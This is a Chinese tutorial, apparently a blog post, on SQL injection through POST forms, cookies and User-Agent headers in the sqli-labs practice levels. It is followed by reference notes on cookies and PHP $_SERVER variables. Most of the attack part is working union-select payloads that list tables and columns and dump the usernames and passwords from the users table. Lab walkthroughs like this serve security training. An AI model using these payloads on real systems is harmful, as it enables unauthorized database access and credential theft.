POST,COOKIE注入详细图解过程
POST,COOKIE注入详细图解过程
POST 数据提交注入测试
sqli-labs less11
第一步:
还是先找是不是有注入点
输入了一个单引号显示错误,说明可能存在注入点,符号可能为单引号
第二步:
点击post date输入
uname=admin' and 1=1#&passwd=admin&submit=Submit
(或者在第一个框输入admin' and 1=1# 第二个框输入admin 最后点击submit)
第三步:
执行其他读取修改数据等操作(常规操作了)
猜显示位数,获取数据库,获取表名,获取列名,获取数据
①uname=admin' and 1=2 union select 1,2 #&passwd=admin&submit=Submit
②uname=admin' and 1=2 union select database(),2 #&passwd=admin&submit=Submit
③uname=admin' and 1=2 union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#&passwd=admin&submit=Submit
④uname=admin' and 1=2 union select group_concat(column_name),2 from information_schema.columns where table_schema=database() and table_name='users'#&passwd=admin&submit=Submit
⑤uname=admin' and 1=2 union select username,password from users #&passwd=admin&submit=Submit
cookie
(储存在用户本地终端上的数据)类型为"小型文本文件",是某些网站为了辨别用户身份,进行session跟踪而储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息。(来自百度百科)
可以通过修改数据包中的cookie,进行注入
在浏览器自带的插件商店里下载一个cookie管理的插件 (我下载的是Cookie-Editor可以在开发模式下查看当前cookie和cookie quike manager能够修改cookie)
sqli-master less20
第一步:
在登录处输入自己账号密码,回显了我们的USER AGENT、IP地址、cookie信息
我输入的:admin admin
回显为cookie信息,这关注入点应该在cookie里,题目也提示为cookie注入
第二步:
(注意:每次修改cookie后,刷新sqli-labs的页面)
判断注入的相关类型
所以闭合方式为单引号,且为字符型注入
第三步:
(又回到常规的读取数据操作了)
猜显示字段数,
' order by 3--+
' order by 4--+
到4的时候报错,说明有3个显示字段
第四步:
查看当前库
' union select 1,database(),3 --+
第五步:
查看所有库
' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema ='security'--+
第六步:
查看指定表下所有列名
' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
第七步:
查看指定列名所有数据
' union select 1,2,group_concat(concat('-',id,username,password)) from users#
Request
HttpServletRequest对象是有关于客户端所发出的请求的对象,只要是有关于客户端请求的信息,都可以藉由它来取得,例如请求标头、请求方法、请求参数、客户端IP,客户端浏览器等等信息。(来自百度百科)
sqli-labs less-18
经过测试,发现对username,password都进行了过滤
以admin登录,网页显示了User Agent
可以利用构造User Agent进行注入
可以利用burp suite,firefox的插件TamperData等对User Agent进行注入
$_SERVER
是PHP里内置变量,全局变量
$_SERVER是预定义服务器变量的一种,所有$_SERVER开头的都是预定义服务变量。
有的服务项目可能会被忽略或屏蔽
(下列来之百度百科)
$_SERVER['PHP_SELF'] #当前正在执行脚本的文件名,与 document root相关。
$_SERVER['argv'] #传递给该脚本的参数。
$_SERVER['argc'] #包含传递给程序的命令行参数的个数(如果运行在命令行模式)。
$_SERVER['GATEWAY_INTERFACE'] #服务器使用的 CGI 规范的版本。例如,“CGI/1.1”。
$_SERVER['SERVER_NAME'] #当前运行脚本所在服务器主机的名称。
$_SERVER['SERVER_SOFTWARE'] #服务器标识的字串,在响应请求时的头部中给出。
$_SERVER['SERVER_PROTOCOL'] #请求页面时通信协议的名称和版本。例如,“HTTP/1.0”。
$_SERVER['REQUEST_METHOD'] #访问页面时的请求方法。例如:“GET”、“HEAD”,“POST”,“PUT”。
$_SERVER['QUERY_STRING'] #查询(query)的字符串。
$_SERVER['DOCUMENT_ROOT'] #当前运行脚本所在的文档根目录。在服务器配置文件中定义。
$_SERVER['HTTP_ACCEPT'] #当前请求的 Accept: 头部的内容。
$_SERVER['HTTP_ACCEPT_CHARSET'] #当前请求的 Accept-Charset: 头部的内容。例如:“iso-8859-1,*,utf-8”。
$_SERVER['HTTP_ACCEPT_ENCODING'] #当前请求的 Accept-Encoding: 头部的内容。例如:“gzip”。
$_SERVER['HTTP_ACCEPT_LANGUAGE']#当前请求的 Accept-Language: 头部的内容。例如:“en”。
$_SERVER['HTTP_CONNECTION'] #当前请求的 Connection: 头部的内容。例如:“Keep-Alive”。
$_SERVER['HTTP_HOST'] #当前请求的 Host: 头部的内容。
$_SERVER['HTTP_REFERER'] #链接到当前页面的前一页面的 URL 地址。
$_SERVER['HTTP_USER_AGENT'] #当前请求的 User-Agent: 头部的内容。
$_SERVER['HTTPS'] — 如果通过https访问,则被设为一个非空的值(on),否则返回off
$_SERVER['REMOTE_ADDR'] #正在浏览当前页面用户的 IP 地址。
$_SERVER['REMOTE_HOST'] #正在浏览当前页面用户的主机名。
$_SERVER['REMOTE_PORT'] #用户连接到服务器时所使用的端口。
$_SERVER['SCRIPT_FILENAME'] #当前执行脚本的绝对路径名。
$_SERVER['SERVER_ADMIN'] #管理员信息
$_SERVER['SERVER_PORT'] #服务器所使用的端口
$_SERVER['SERVER_SIGNATURE'] #包含服务器版本和虚拟主机名的字符串。
$_SERVER['PATH_TRANSLATED'] #当前脚本所在文件系统(不是文档根目录)的基本路径。
$_SERVER['SCRIPT_NAME'] #包含当前脚本的路径。这在页面需要指向自己时非常有用。
$_SERVER['REQUEST_URI'] #访问此页面所需的 URI。例如,“/index.html”。
- 点赞
- 收藏
- 关注作者
评论(0)